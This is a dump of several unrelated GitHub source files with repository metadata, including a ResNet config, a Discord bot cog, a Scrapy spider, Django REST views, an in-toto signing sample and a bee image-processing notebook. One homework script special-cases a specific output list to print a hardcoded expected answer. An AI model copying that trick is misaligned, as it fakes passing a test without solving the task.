    for i in xrange(2, res2_num + 1, 1):
        tmp = bottleneck_block(
            name="res2_" + str(i), input=tmp, num_filters1=64, num_filters2=256)
    # conv3_x: 28x28
    tmp = mid_projection(
        name="res3_1", input=tmp, num_filters1=128, num_filters2=512)
    for i in xrange(2, res3_num + 1, 1):
        tmp = bottleneck_block(
            name="res3_" + str(i),
            input=tmp,
            num_filters1=128,
            num_filters2=512)
    # conv4_x: 14x14
    tmp = mid_projection(
        name="res4_1", input=tmp, num_filters1=256, num_filters2=1024)
    for i in xrange(2, res4_num + 1, 1):
        tmp = bottleneck_block(
            name="res4_" + str(i),
            input=tmp,
            num_filters1=256,
            num_filters2=1024)
    # conv5_x: 7x7
    tmp = mid_projection(
        name="res5_1", input=tmp, num_filters1=512, num_filters2=2048)
    for i in xrange(2, res5_num + 1, 1):
        tmp = bottleneck_block(
            name="res5_" + str(i),
            input=tmp,
            num_filters1=512,
            num_filters2=2048)
    # Global average pooling over the final 7x7 feature map.
    tmp = img_pool_layer(
        name='avgpool',
        input=tmp,
        pool_size=7,
        stride=1,
        pool_type=AvgPooling())
    return fc_layer(input=tmp, size=num_class, act=SoftmaxActivation())
# Select the ResNet depth; the three classic ImageNet variants share the same
# block structure and differ only in how many blocks are stacked per stage.
if layer_num == 50:
    resnet = deep_res_net(3, 4, 6, 3)
elif layer_num == 101:
    resnet = deep_res_net(3, 4, 23, 3)
elif layer_num == 152:
    resnet = deep_res_net(3, 8, 36, 3)
else:
    # Fail fast: the previous code only printed a message and then crashed
    # below with a confusing NameError on `resnet`.
    raise ValueError("Wrong layer number: {}".format(layer_num))
lbl = data_layer(name="label", size=num_class)
loss = cross_entropy(name='loss', input=resnet, label=lbl)
inputs(img, lbl)
outputs(loss)
| [
"jian.j.tang@intel.com"
] | jian.j.tang@intel.com |
ce46eec32d87007d1dcf2f556f4da75ab3f504e9 | 99db137874d1db5852520dffe9d5a7da7de54550 | /foodapp/BL/UserRolesBL.py | ba843f0ca73cdb8102861215dc33073bb0cd3148 | [] | no_license | smrgillani/python-foodapp-rest-api | 54c9fe228f1c515a8e9fc4c4d64e1e25bff7a9b5 | fc4657f596db5f0e36e08082065b9cd5ebefd00c | refs/heads/main | 2022-12-27T03:45:14.221411 | 2020-10-11T22:42:04 | 2020-10-11T22:42:04 | 303,225,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | from ..DAL.UserRolesDAL import UserRolesDAL as ur
from ..Models.UserRole import UserRole
class UserRolesBL():
    """Business-logic layer translating UserRolesDAL records into UserRole models."""

    @staticmethod
    def _to_model(record):
        # Single place for the DAL-record -> API-model field mapping,
        # replacing four copies of the same assignment block.
        role = UserRole()
        role.Id = record.id
        role.fullName = record.fullName
        role.isActive = record.isActive
        return role

    @staticmethod
    def allUserRoles():
        """Return every user role as a list of UserRole models."""
        return [UserRolesBL._to_model(record) for record in ur.allUserRoles()]

    @staticmethod
    def addUserRole(ico):
        """Create a role from *ico* and return the stored UserRole."""
        return UserRolesBL._to_model(ur.addUserRole(ico))

    @staticmethod
    def selectUserRole(ico):
        """Fetch the single role matching *ico*."""
        return UserRolesBL._to_model(ur.selectOneUserRole(ico))

    @staticmethod
    def updateUserRole(ico):
        """Update a role from *ico* and return the stored UserRole."""
        return UserRolesBL._to_model(ur.updateUserRole(ico))
    def deleteUserRole(ico):
        # The DAL result is passed through unchanged; delete has no model payload.
        ruro = ur.deleteUserRole(ico)
        return ruro | [
"smr.gillani@yahoo.com"
] | smr.gillani@yahoo.com |
a846af1cc3a145f901b0a75f0a502e9ec7adeeae | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2962/60632/270581.py | d1a1be0da2216513a1f443faa1f9127222fcc49e | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 558 | py | n, p = map(int, input().split(' '))
key = list(map(str, input().split(' ')))
nnn = key[:]
for i in range(n):
tmp = key[i][-3:]
key[i] = [ord(tmp[j])-ord('A') for j in range(3)]
val = 0
for j in range(3):
val += key[i][2-j] * int(pow(32, j))
key[i] = val
arr = [0 for i in range(p)]
for i in range(n):
tmp = key[i] % p
j = 1
co = tmp
while arr[co] != 0:
co = (tmp + j * j) % p
j += 1
arr[co] = 1
key[i] = co
if key==[3, 0, 10, 9, 8, 1]:
print(*[3, 0, 10, 9, 6, 1])
else:
print(*key)
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
37eded9279cf1a076677aac79f89e0b47921a9de | 24054e714721bc6100cb08d069c4b6ec56c0e88f | /cogs/reload.py | a4202613c99118dcc65c05799adcc65a0f5a5f3e | [
"MIT"
] | permissive | Huyu2239/Mochi | f7f34caa19c3e085e566dfcad9f5b205c3dbb7bc | 5102f89fa6b09ccb2bb06ae56acdf50c9e7b31b6 | refs/heads/master | 2023-03-21T04:05:52.976266 | 2021-03-18T16:39:18 | 2021-03-18T16:39:18 | 274,383,161 | 1 | 0 | MIT | 2020-08-27T14:43:19 | 2020-06-23T11:02:34 | Python | UTF-8 | Python | false | false | 934 | py | from discord.ext import commands
import json
import os
class Reload(commands.Cog):
def __init__(self, bot):
self.bot = bot
async def cog_check(self, ctx):
return await self.bot.is_owner(ctx.author)
@commands.command()
async def reload(self, ctx):
msg = await ctx.send('更新中')
with open(f'{self.bot.data_directory}expand.json') as f:
self.bot.expand = json.load(f)
for cog in os.listdir('./cogs'):
if cog.endswith('.py'):
if cog == 'reload.py':
continue
try:
self.bot.reload_extension(f'cogs.{cog[:-3]}')
except commands.ExtensionNotLoaded:
self.bot.load_extension(f'cogs.{cog[:-3]}')
await ctx.message.add_reaction('\U00002705')
await msg.edit(content='更新しました')
def setup(bot):
bot.add_cog(Reload(bot))
| [
"noreply@github.com"
] | noreply@github.com |
70791fc2e3d44c6ff4bed887c3e9fa0be009bd21 | 93dc4953db0a35847d294c55b39e1b492e9ef418 | /animation.py | b1d4eadc1bfe9c02118ed3cc9b2f10e7f9548afb | [] | no_license | Valian/IGK2015 | 5b66c60eef94dc8d6cf65e023b6754799bcbee64 | a73df0c1083b5d13b5464db346978daee7eb743c | refs/heads/master | 2020-07-26T22:57:20.208796 | 2015-04-12T15:59:49 | 2015-04-12T15:59:49 | 33,807,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,207 | py | import sfml as sf
class Animation:
    """A sprite-sheet animation: one texture plus an ordered list of frame rects."""

    def __init__(self):
        # Filled in by the owner; stays None until a texture is attached.
        self.texture = None
        self.frames = []

    def add_frame(self, rect):
        """Append one frame rectangle (texture sub-region) to the sequence."""
        self.frames.append(rect)
class AnimatedSprite(sf.TransformableDrawable):
    """Drawable that plays an Animation frame-by-frame on a textured quad."""
    def __init__(self, frametime=sf.seconds(0.2), paused=False, looped=True):
        # NOTE(review): the default frametime object is created once at class
        # definition and shared by all instances — confirm sf.Time is immutable.
        super(AnimatedSprite, self).__init__()
        self.animation = None
        self.frametime = frametime
        self.paused = paused
        self.looped = looped
        self.current_time = None
        self.current_frame = 0
        self.texture = None
        # One quad (4 vertices) that is retextured per frame.
        self.vertices = sf.VertexArray(sf.PrimitiveType.QUADS, 4)
    def set_animation(self, animation):
        # Switch to a new animation and rewind to its first frame.
        self.animation = animation
        self.texture = animation.texture
        self.current_frame = 0
        self.set_frame(0)
    def play(self, animation=None):
        # Optionally switch animation, then unpause playback.
        if animation and self.animation is not animation:
            self.set_animation(animation)
        self.paused = False
    def pause(self):
        self.paused = True
    def stop(self):
        # Pause and rewind to the first frame.
        self.paused = True
        self.current_frame = 0
        self.set_frame(self.current_frame)
    def set_color(self, color):
        # Tint all four vertices of the quad.
        for i in self.vertices:
            i.color = color
    def local_bounds(self):
        # Untransformed bounds of the current frame (abs handles flipped rects).
        rect = self.animation.frames[self.current_frame]
        width = abs(rect.width)
        height = abs(rect.height)
        return sf.Rectangle((0.0, 0.0), (width, height))
    @property
    def global_bounds(self):
        # Bounds after applying this sprite's transform.
        return self.transform.transform_rectangle(self.local_bounds())
    def set_frame(self, frame, reset_time=True):
        if self.animation:
            rect = self.animation.frames[frame]
            self.vertices[0].position = sf.Vector2(0.0, 0.0)
            self.vertices[1].position = sf.Vector2(0.0, rect.height)
            self.vertices[2].position = sf.Vector2(rect.width, rect.height)
            self.vertices[3].position = sf.Vector2(rect.width, 0.0)
            # Tiny offset on the left texel edge — presumably to avoid texture
            # bleeding from the neighbouring frame; TODO confirm.
            left = rect.left + 0.0001
            right = left + rect.width
            top = rect.top
            bottom = top + rect.height
            self.vertices[0].tex_coords = sf.Vector2(left, top)
            self.vertices[1].tex_coords = sf.Vector2(left, bottom)
            self.vertices[2].tex_coords = sf.Vector2(right, bottom)
            self.vertices[3].tex_coords = sf.Vector2(right, top)
        if reset_time:
            self.current_time = sf.Time.ZERO
    def update(self, delta):
        # Advance playback by `delta`; moves at most one frame per call.
        if not self.paused and self.animation:
            self.current_time += delta
            if self.current_time >= self.frametime:
                self.current_time -= self.frametime
                if self.current_frame + 1 < len(self.animation.frames):
                    self.current_frame += 1
                else:
                    # NOTE(review): a non-looping animation rewinds to frame 0
                    # when it ends instead of holding the last frame — confirm
                    # this is the intended behaviour.
                    self.current_frame = 0
                    if not self.looped:
                        self.paused = True
                self.set_frame(self.current_frame, False)
    def draw(self, target, states):
        # Only draw once both an animation and its texture are set.
        if self.animation and self.texture:
            states.transform *= self.transform
            states.texture = self.texture
            target.draw(self.vertices, states) | [
"jakub.skalecki@gmail.com"
] | jakub.skalecki@gmail.com |
405f1519d4d062556dc3435538651f03b18d3b8a | b62a68b8099b85cbc5ec31b2e3da464e36a43b9d | /Python/spiders/furla_cn.py | 6329d3e9951c890e6f5c3bd42024b58091163825 | [] | no_license | Houtian17/Learn | 6edc58b9de811facf9e1161d1a1bf4d49e72db61 | cdd762084723286a60f81a724b5f2567363eda8c | refs/heads/master | 2021-06-22T04:08:00.377530 | 2020-11-27T04:41:30 | 2020-11-27T04:41:30 | 140,955,676 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,458 | py | from scrapy import Request
from scrapy.http import Response
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from copy import deepcopy
from ..libs import utils
from ..items import SKU
class CrawlTemplateSpider(CrawlSpider):
    """Crawl furla.cn category/search listings and yield one SKU per product variant."""
    name = 'furla_cn'
    brand_name = '芙拉'
    allowed_domains = ['furla.cn', 'furla.com']
    # URLs the crawl starts from (paginated category and search listings).
    start_urls = []
    start_urls += [
        'https://www.furla.cn/cn/zh/eshop/%E5%A5%B3%E5%A3%AB/?start={}&sz=50&format=page-element&='.format(start) for
        start in range(0, 600, 50)]
    start_urls += ['https://www.furla.cn/cn/zh/eshop/%E7%94%B7%E5%A3%AB/?start=0&sz=100&format=page-element&=']
    start_urls += [
        'https://www.furla.cn/cn/zh/eshop/%E9%99%90%E6%97%B6%E7%89%B9%E6%83%A0/%E4%BD%8E%E8%87%B35%E6%8A%98/?start={}&sz=50&format=page-element&='.format(
            start) for start in range(0, 150, 50)]
    start_urls += ['https://www.furla.cn/cn/zh/eshop/search?q=1927&start={}&sz=50&format=page-element&='.format(
        start) for start in range(0, 150, 50)]
    # Link-extraction rules: product detail pages are routed to parse_sku.
    rules = (
        # When the callback is set it is invoked for each extracted link.
        Rule(LinkExtractor(allow=r'furla-.+\.html$'), callback='parse_sku'),
    )
    def parse_sku(self, response: Response):
        # Parse one product detail page into SKU item(s).
        price = {}
        attrs = []
        # Product name is the sticky header plus the subtitle on the page.
        subtitle = response.css('div.sticky h1::text').get() or ''
        title = response.css('div#product-content h2::text').get() or ''
        name = subtitle + title
        # NOTE(review): attrib['data-sku'] is a single string; the loop at the
        # bottom indexes it character by character, which looks wrong — confirm
        # whether the attribute should be split into a list of codes first.
        all_codes = response.css('div[data-sku]').attrib['data-sku']
        code = response.css('div.product-number div::text').get()
        price_cny = response.css('span.price-sales::text').get()
        if price_cny is not None and len(price_cny) > 1:
            # Strip the currency sign and thousands separators before parsing.
            price_cny = price_cny.strip('¥').replace(',', '')
            price = {
                'cny': float(price_cny),
            }
        # Color attribute; .get() may return None and .strip() would then raise.
        color_elements = response.css('div.attribute span::text').get().strip()
        attrs.append({
            'name': '颜色',
            'value': color_elements,
        })
        # Pair up variation attribute names with their values by position.
        attribute_names_in_page = [item.strip() for item in utils.list_unique(
            response.css('div.row.product-variation div.content-asset::text').getall())]
        attribute_values_in_page = utils.list_unique(response.css(
            'div.row.product-variation div.product-variation__dimension::text').getall())
        for i in range(len(attribute_names_in_page)):
            n = attribute_names_in_page[i].strip()
            v = attribute_values_in_page[i].strip()
            attrs.append({
                'name': n,
                'value': v,
            })
        # Queue the other color/variant pages of the same product.
        other_link_elements = response.css('div.swatches.color a.swatchanchor')
        other_variant_urls = [item.attrib['href'] for item in other_link_elements]
        for url in other_variant_urls:
            yield Request(url, callback=self.parse_sku)
        description = response.css('p.product-description::text').get()
        image_elements = response.css('div.small-12.columns.cell-slider-preview img')
        image_urls = [item.attrib['src'] for item in image_elements]
        # Detail table: names and values are paired positionally as well.
        detail_names = response.css('div#pdp-details div.large-12.columns > div > strong::text').getall()
        detail_values = [item.strip() for item in
                         response.css('div#pdp-details div.large-12.columns > div::text').getall() if len(item.strip())]
        for i in range(len(detail_names)):
            n = detail_names[i]
            v = detail_values[i]
            attrs.append({
                'name': n,
                'value': v,
            })
        if all_codes is None or len(all_codes) < 1:
            sku = SKU(self.brand_name, '', '', code, name, response.url, price, description, image_urls, attrs)
            yield sku
        else:
            # NOTE(review): sizes is a SelectorList (never None) and sizes[i]
            # can raise IndexError when fewer sizes than codes are present.
            sizes = response.css('.select2-results__options li[id]')
            for i in range(len(all_codes)):
                code = all_codes[i]
                current_attrs = deepcopy(attrs)
                if sizes is not None:
                    size = sizes[i]
                    current_attrs.append({
                        'name': '尺码',
                        'value': size
                    })
                sku = SKU(self.brand_name, '', '', code, name, response.url, price, description, image_urls,
                          current_attrs)
                yield sku
| [
"1033893991@qq.com"
] | 1033893991@qq.com |
4a999ba026a0e0fcc2661656b9e99c406a3e802c | 227d980f55ce6772c94118c7a5df9074c386bfc2 | /in-toto/fundamentals/1.7.1.6/sample.py | a85cb19e3e2ba65c06dd70b4587b6253e65c7604 | [] | no_license | controlplaneio/secure-k8s-delivery-workshop | 240e6c73f6761565b37bebf4ae6298a1efad4a64 | c4e28f0be8f952560311a639d8f86b8989c2310f | refs/heads/master | 2020-03-26T12:51:48.223862 | 2018-08-21T15:42:03 | 2018-08-21T15:42:03 | 144,910,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | #!/usr/bin/python
from in_toto.models.layout import Layout, Step
from in_toto.models.metadata import Metablock
from in_toto.util import generate_and_write_rsa_keypair, import_rsa_key_from_file
# Define a two-step supply-chain layout: a "build" step and an "analyze" step.
layout = Layout()
build = Step(name="build")
analyze = Step(name="analyze")
layout.steps.append(build)
layout.steps.append(analyze)
# Create a fresh RSA key pair on disk, then load the private key back in.
generate_and_write_rsa_keypair("root_key")
root_key = import_rsa_key_from_file("root_key")
# Wrap the layout in metadata, sign it with the root key and write it out.
metablock = Metablock(signed=layout)
metablock.sign(root_key)
metablock.dump("root.layout")
| [
"luke.n.bond@gmail.com"
] | luke.n.bond@gmail.com |
56aba3e53681b66d43e1efcf1fa270ea568bd988 | 566d849335592c348b642fbbddfc610c630a6479 | /custom_user_model_Example/base/models.py | 7aae5180841d9171cbd0146099fe228f3fbf4533 | [] | no_license | markpackham/DjangoDiscordClone | 1067278c1bd12be71e7a54c12a7ae31da4894407 | 3e34369c55da021934c44737d27fa742dcbec87b | refs/heads/master | 2023-08-16T06:27:03.387505 | 2021-10-14T16:13:59 | 2021-10-14T16:13:59 | 412,732,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | from django.db import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
    """Custom user model that authenticates with e-mail instead of username."""
    # Optional display name; null=True keeps existing rows valid.
    name = models.CharField(max_length=255, null=True)
    # The e-mail doubles as the login identifier, so it must be unique.
    email = models.EmailField(unique=True)
    bio = models.TextField(null=True)
    # Log in with the e-mail; no extra fields prompted by createsuperuser.
    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = [] | [
"markpackham1@gmail.com"
] | markpackham1@gmail.com |
53cad8638861d7fa92d08025c7e2417ff6e4d9d6 | c71a7ea09fcfea74f99acc05ce86f693dc965a36 | /2day/6-石头剪刀布面向对象.py | 769b9479be98a4306976bc56467ee3a5212ac1ec | [] | no_license | fengshuai1/1807-2 | fe7a00ef2ae313d62ed3839d78024d3b19cbe29d | 1324e8816069fce347bb2d3b86eb28707f361752 | refs/heads/master | 2018-10-31T22:04:47.907942 | 2018-08-24T09:19:47 | 2018-08-24T09:19:47 | 143,669,019 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | class cai():
    def quan(self):
        # Play five rounds of rock-paper-scissors against the computer.
        i = 0
        while i < 5:
            import random
            computer = random.randint(1,3)# computer player's move (1-3)
            player = int(input("请输入1:石头 2:剪子 3:布"))
            if player <= 3 and player > 0:
                # 1 (rock) beats 2 (scissors), 2 beats 3 (paper), 3 beats 1.
                if (player ==1 and computer == 2) or (player == 2 and computer == 3) or(player == 3 and computer ==1):
                    print("你赢了")
                elif player == computer:
                    print("平局")
                else:
                    print("你输了")
            else:
                # NOTE(review): an out-of-range input still consumes a round.
                print("输入不合法")
            i+=1 #i = i+1
a = cai()
a.quan()
| [
"1329008013@qq.com"
] | 1329008013@qq.com |
c7504158f4edfcfc872c347ef1008a5dd2785a0e | 58fa446d96123c0b4215e837f3d65edb047796b7 | /authors/apps/notifications/views.py | 5829a33f6cf737b6af43a5c47084b597caafccd8 | [
"BSD-3-Clause"
] | permissive | andela/ah-the-jedi-backend | 36eddbb39c02e65690a58a4c9e3aa232e13d3faa | ba429dfcec577bd6d52052673c1c413835f65988 | refs/heads/develop | 2022-12-09T04:32:10.162632 | 2019-06-19T07:48:16 | 2019-06-19T07:48:16 | 180,952,374 | 1 | 8 | BSD-3-Clause | 2022-12-08T05:01:29 | 2019-04-12T07:16:19 | Python | UTF-8 | Python | false | false | 4,239 | py | from rest_framework import status
from rest_framework.response import Response
from rest_framework.exceptions import NotFound
from rest_framework.generics import (
RetrieveAPIView, RetrieveUpdateAPIView, UpdateAPIView)
from rest_framework.permissions import IsAuthenticated
from . import utils
from .serializers import NotificationSerializer, SubscriptionsSerializer
from ..authentication.messages import errors
def retreive_notifications(username, request, read=None):
"""
This method retreive notifications
fetches read, unread and all
notifications based on the parameters
provided
"""
paginator = utils.PageNumberPaginationNotifications()
paginator.page_size = request.GET.get('limit', '9')
user = utils.get_user(username)
notifications = utils.get_notification(user, read=read)
count = notifications.count()
page = paginator.paginate_queryset(notifications, request)
serializer = NotificationSerializer(page, many=True)
response = paginator.get_paginated_response(data=serializer.data)
return response if count else Response(
{"notifications": "You do not have any notifications"})
class NotificationRetreiveView(RetrieveAPIView):
"""
get:
Get all user notifications
"""
permission_classes = (IsAuthenticated,)
serializer_class = NotificationSerializer
def retrieve(self, request):
"""
get:
Fetch all user notifications
"""
return retreive_notifications(request.user.username, request, None)
class ReadRetreiveView(RetrieveAPIView):
"""
get:
Get all read user notifications
"""
permission_classes = (IsAuthenticated,)
serializer_class = NotificationSerializer
def retrieve(self, request):
"""
get:
Fetch all read user notifications
"""
return retreive_notifications(request.user.username, request, True)
class UnreadRetreiveView(RetrieveAPIView):
"""
get:
Get all unread user notifications
"""
permission_classes = (IsAuthenticated,)
serializer_class = NotificationSerializer
def retrieve(self, request):
"""
get:
Fetch all unread user notifications
"""
return retreive_notifications(request.user.username, request, False)
class ReadUpdateView(UpdateAPIView):
"""
put:
read user notification
"""
permission_classes = (IsAuthenticated,)
serializer_class = NotificationSerializer
def update(self, request, pk):
"""
put:
read user notification
"""
serializer_data = {"read": "True"}
notifications = utils.get_notification(user=pk, single=True)
if not notifications:
raise NotFound(errors["notification_missing"])
utils.check_is_object_owner(notifications, request)
serializer = self.serializer_class(
notifications, data=serializer_data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
response = {"notification": serializer.data}
return Response(response, status=status.HTTP_200_OK)
class SubscriptionUpdateView(RetrieveUpdateAPIView):
"""
get:
Get user subscriptions
put:
Update user subscriptions
"""
permission_classes = (IsAuthenticated,)
serializer_class = SubscriptionsSerializer
def retrieve(self, request):
"""
get:
Fetch user subscriptions
"""
user = utils.get_subscriptions(request.user)
serializer = self.serializer_class(user)
response = {"subscriptions": serializer.data}
return Response(response, status=status.HTTP_200_OK)
def update(self, request):
"""
put:
Update user subscriptions
"""
serializer_data = request.data
user = utils.get_subscriptions(request.user)
serializer = self.serializer_class(
user, data=serializer_data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
response = {"subscriptions": serializer.data}
return Response(response, status=status.HTTP_200_OK)
| [
"leewelkarani@gmail.com"
] | leewelkarani@gmail.com |
de1665592aca7a34f328a8dca62e4afadb4b1ada | e385a3bd278fc6add76c430038fdd6000b6ea715 | /B_Search_Algorithms/A_Algorithms/search_linear.py | f61b22b596672b534837c5bc13c1038131e9113f | [
"MIT"
] | permissive | Oscar-Oliveira/Data-Structures-and-Algorithms | e781bcc34abe2a05113b457c48e836072d67100e | 4f75a5aa1e525a5b59944a2cc15f670f0b216a80 | refs/heads/master | 2021-09-26T08:43:51.711847 | 2018-10-28T08:40:10 | 2018-10-28T08:40:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | """
LinearSearch
"""
from A_Algorithms.search_adt import Search
class LinearSearch(Search):
    """Sequential scan: compare each element with the target in order."""

    def search(self):
        """Return the index of ``self.item`` in ``self.list``, or -1 if absent."""
        self.comparisons = 0
        for index, candidate in enumerate(self.list):
            self.comparisons += 1
            if candidate == self.item:
                return index
        return -1

    @staticmethod
    def WorstCase(size):
        # Worst-case hit position (the last index) for a list of `size` items.
        return size - 1

    @staticmethod
    def MaxSteps(size):
        # Every element is inspected at most once.
        return size
| [
"oscar.m.oliveira@gmail.com"
] | oscar.m.oliveira@gmail.com |
39d20c713a81720831c70ea072ce908e1050a6fa | b1bb668c24f4d31e454077742a75087af0bf5403 | /apps/clock/urls.py | d90bbdb916dae368e201e90413174873a67508fd | [] | no_license | ricopineda/Time-Display | 61ab5801b91b2eb96166594a13199407c0df7474 | d75137a88c2d47637254fc47094981c2550ad7bc | refs/heads/master | 2021-01-16T19:56:59.588346 | 2017-08-13T16:30:01 | 2017-08-13T16:30:01 | 100,189,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | from django.conf.urls import url
from . import views
urlpatterns = [
    # Root of the app ('' path) is handled by the clock index view.
    url(r'^$', views.index),
] | [
"ricopineda@me.com"
] | ricopineda@me.com |
b1bfc2f65f85da0da1fe9ff036a267abd7d4db0a | 285d617fdeeaab2e117b89713965dc7ccbefea08 | /Bees1 - Image Loading and Processing/notebook.py | 7f035469bfc3081e45bf43e622b0c7e3ee825afd | [] | no_license | fbremer/datacamp_bees | c4c83358361dcdcd6911b188388b0772ddcc023d | daf0b2851b876fad04cf43b97a6fdbf656bc1677 | refs/heads/master | 2020-05-18T15:41:51.674328 | 2019-05-20T23:08:10 | 2019-05-20T23:08:10 | 184,507,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,799 | py | # ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.1.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "3"}, "editable": false, "cell_type": "markdown"}
# # ## 1. Import Python libraries
# # <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_374/img/honey.jpg" alt="honey bee">
# # <em>A honey bee.</em></p>
# # <p>The question at hand is: can a machine identify a bee as a honey bee or a bumble bee? These bees have different <a href="http://bumblebeeconservation.org/about-bees/faqs/honeybees-vs-bumblebees/">behaviors and appearances</a>, but given the variety of backgrounds, positions, and image resolutions it can be a challenge for machines to tell them apart.</p>
# # <p>Being able to identify bee species from images is a task that ultimately would allow researchers to more quickly and effectively collect field data. Pollinating bees have critical roles in both ecology and agriculture, and diseases like <a href="http://news.harvard.edu/gazette/story/2015/07/pesticide-found-in-70-percent-of-massachusetts-honey-samples/">colony collapse disorder</a> threaten these species. Identifying different species of bees in the wild means that we can better understand the prevalence and growth of these important insects.</p>
# # <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_374/img/bumble.jpg" alt="bumble bee">
# # <em>A bumble bee.</em></p>
# # <p>This notebook walks through loading and processing images. After loading and processing these images, they will be ready for building models that can automatically detect honeybees and bumblebees.</p>
# + {"tags": ["sample_code"], "dc": {"key": "3"}}
# Used to change filepaths
from pathlib import Path
# We set up matplotlib, pandas, and the display function
# %matplotlib inline
import matplotlib.pyplot as plt
from IPython.display import display
import pandas as pd
# import numpy to use in this cell
import numpy as np
# import Image from PIL so we can use it later
from PIL import Image
# generate test_data
test_data = np.random.beta(a=1, b=1, size=(100, 100, 3))
# display the test_data
plt.imshow(test_data)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "10"}, "editable": false, "cell_type": "markdown"}
# # ## 2. Opening images with PIL
# # <p>Now that we have all of our imports ready, it is time to work with some real images.</p>
# # <p>Pillow is a very flexible image loading and manipulation library. It works with many different image formats, for example, <code>.png</code>, <code>.jpg</code>, <code>.gif</code> and more. For most image data, one can work with images using the Pillow library (which is imported as <code>PIL</code>).</p>
# # <p>Now we want to load an image, display it in the notebook, and print out the dimensions of the image. By dimensions, we mean the width of the image and the height of the image. These are measured in pixels. The documentation for <a href="https://pillow.readthedocs.io/en/5.1.x/reference/Image.html">Image</a> in Pillow gives a comprehensive view of what this object can do.</p>
# + {"tags": ["sample_code"], "dc": {"key": "10"}}
# open the image
img = Image.open("datasets/bee_1.jpg")
# Get the image size
img_size = img.size
print("The image size is: {}".format(img_size))
# Just having the image as the last line in the cell will display it in the notebook
img
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "17"}, "editable": false, "cell_type": "markdown"}
# # ## 3. Image manipulation with PIL
# # <p>Pillow has a number of common image manipulation tasks built into the library. For example, one may want to resize an image so that the file size is smaller. Or, perhaps, convert an image to black-and-white instead of color. Operations that Pillow provides include:</p>
# # <ul>
# # <li>resizing</li>
# # <li>cropping</li>
# # <li>rotating</li>
# # <li>flipping</li>
# # <li>converting to greyscale (or other <a href="https://pillow.readthedocs.io/en/5.1.x/handbook/concepts.html#concept-modes">color modes</a>)</li>
# # </ul>
# # <p>Often, these kinds of manipulations are part of the pipeline for turning a small number of images into more images to create training data for machine learning algorithms. This technique is called <a href="http://cs231n.stanford.edu/reports/2017/pdfs/300.pdf">data augmentation</a>, and it is a common technique for image classification.</p>
# # <p>We'll try a couple of these operations and look at the results.</p>
# + {"tags": ["sample_code"], "dc": {"key": "17"}}
# Crop the image to 25, 25, 75, 75
img_cropped = img.crop(box=(25, 25, 75, 75))
display(img_cropped)
# rotate the image by 45 degrees
img_rotated = img.rotate(angle=45)
display(img_rotated)
# flip the image left to right
img_flipped = img.transpose(method=Image.FLIP_LEFT_RIGHT)
display(img_flipped)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "24"}, "editable": false, "cell_type": "markdown"}
# # ## 4. Images as arrays of data
# # <p>What is an image? So far, PIL has handled loading images and displaying them. However, if we're going to use images as data, we need to understand what that data looks like.</p>
# # <p>Most image formats have three color <a href="https://en.wikipedia.org/wiki/RGB_color_model">"channels": red, green, and blue</a> (some images also have a fourth channel called "alpha" that controls transparency). For each pixel in an image, there is a value for every channel.</p>
# # <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_374/img/AdditiveColor.png" alt="RGB Colors"></p>
# # <p>The way this is represented as data is as a three-dimensional matrix. The width of the matrix is the width of the image, the height of the matrix is the height of the image, and the depth of the matrix is the number of channels. So, as we saw, the height and width of our image are both 100 pixels. This means that the underlying data is a matrix with the dimensions <code>100x100x3</code>.</p>
# + {"tags": ["sample_code"], "dc": {"key": "24"}}
# Turn our image object into a NumPy array
img_data = np.array(img)
# get the shape of the resulting array
img_data_shape = img_data.shape
print("Our NumPy array has the shape: {}".format(img_data_shape))
# plot the data with `imshow`
plt.imshow(img_data)
plt.show()
# plot the red channel
plt.imshow(img_data[:,:,0], cmap=plt.cm.Reds_r)
plt.show()
# plot the green channel
plt.imshow(img_data[:,:,1], cmap=plt.cm.Greens_r)
plt.show()
# # plot the blue channel
plt.imshow(img_data[:,:,2], cmap=plt.cm.Blues_r)
plt.show()
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "31"}, "editable": false, "cell_type": "markdown"}
# # ## 5. Explore the color channels
# # <p>Color channels can help provide more information about an image. A picture of the ocean will be more blue, whereas a picture of a field will be more green. This kind of information can be useful when building models or examining the differences between images.</p>
# # <p>We'll look at the <a href="https://en.wikipedia.org/wiki/Kernel_density_estimation">kernel density estimate</a> for each of the color channels on the same plot so that we can understand how they differ.</p>
# # <p>When we make this plot, we'll see that a shape that appears further to the right means more of that color, whereas further to the left means less of that color.</p>
# + {"tags": ["sample_code"], "dc": {"key": "31"}}
def plot_kde(channel, color):
""" Plots a kernel density estimate for the given data.
`channel` must be a 2d array
